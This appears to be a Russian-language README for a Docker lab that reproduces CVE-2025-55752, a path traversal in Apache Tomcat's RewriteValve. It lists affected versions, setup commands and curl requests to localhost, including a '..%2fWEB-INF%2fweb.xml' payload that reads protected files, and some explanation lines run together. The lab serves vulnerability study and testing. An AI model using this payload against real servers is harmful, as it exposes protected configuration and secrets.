
Docker-среда воспроизведения для CVE-2025-55752, уязвимости обхода пути в RewriteValve Apache Tomcat, демонстрирующая ошибку нормализации до декодирования и предоставляющая команды для тестирования.
Среда воспроизведения на базе Docker для CVE-2025-55752 — уязвимости обхода пути в Apache Tomcat 10.1.44.
CVE-2025-55752 — это уязвимость обхода пути в RewriteValve Apache Tomcat, вызванная некорректным порядком обработки: нормализация URL происходит до декодирования URL. Это позволяет злоумышленникам обходить ограничения безопасности, защищающие каталоги вроде /WEB-INF/, с помощью URL-кодированных последовательностей обхода пути (..%2f).
| Серия | Уязвимые версии | Исправленная версия |
|---|
| 11.x | 11.0.0-M1 — 11.0.10 | 11.0.11+ |
| 10.1.x | 10.1.0-M1 — 10.1.44 | 10.1.45+ |
| 9.0.x | 9.0.0-M11 — 9.0.108 | 9.0.109+ |
| 8.5.x | 8.5.6 — 8.5.100 | EOL — исправления нет |
git clone https://github.com/masahiro331/CVE-2025-55752.git
cd CVE-2025-55752
docker-compose up -d
curl http://localhost:8080/
curl -I 'http://localhost:8080/WEB-INF/web.xml'
Ожидаемый результат: 403 Forbidden
curl -s 'http://localhost:8080/download?path=..%2fWEB-INF%2fweb.xml' | head -5
curl -I 'http://localhost:8080/download?path=..%2fWEB-INF%2fweb.xml'
Ожидаемый результат: 200 OK + содержимое web.xml (уязвимость подтверждена)
/download?path=..%2fWEB-INF%2fweb.xml/files/..%2fWEB-INF%2fweb.xml%2f не распознаётся как /, .. сохраняется%2f → / → /files/../WEB-INF/web.xml/WEB-INF/web.xmlПравильно: Декодирование → Нормализация → Проверка безопасности
Уязвимо: Нормализация → Декодирование → Проверка безопасности ✗
../ и %2e%2e⚠️ ПРЕДУПРЕЖДЕНИЕ: Не разворачивайте в производственной среде. Используйте только в изолированных тестовых средах.